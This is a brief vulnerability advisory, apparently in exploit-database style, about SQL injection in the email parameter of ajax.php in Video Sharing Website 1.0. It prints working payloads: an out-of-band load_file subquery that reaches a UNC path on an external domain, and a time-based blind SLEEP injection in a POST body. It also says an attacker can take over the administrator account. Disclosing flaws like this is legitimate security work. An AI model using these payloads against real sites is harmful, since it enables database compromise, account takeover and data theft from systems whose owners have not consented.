Video-Sharing-Website
Vendor
Description:
The email parameter from ajax.php app of Video Sharing Website 1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\pkq'))+' was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system.
Status: CRITICAL
[+] Payload:
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=jsmith@sample.com'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'' AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND 'yreq'='yreq&password=jsmith123
---
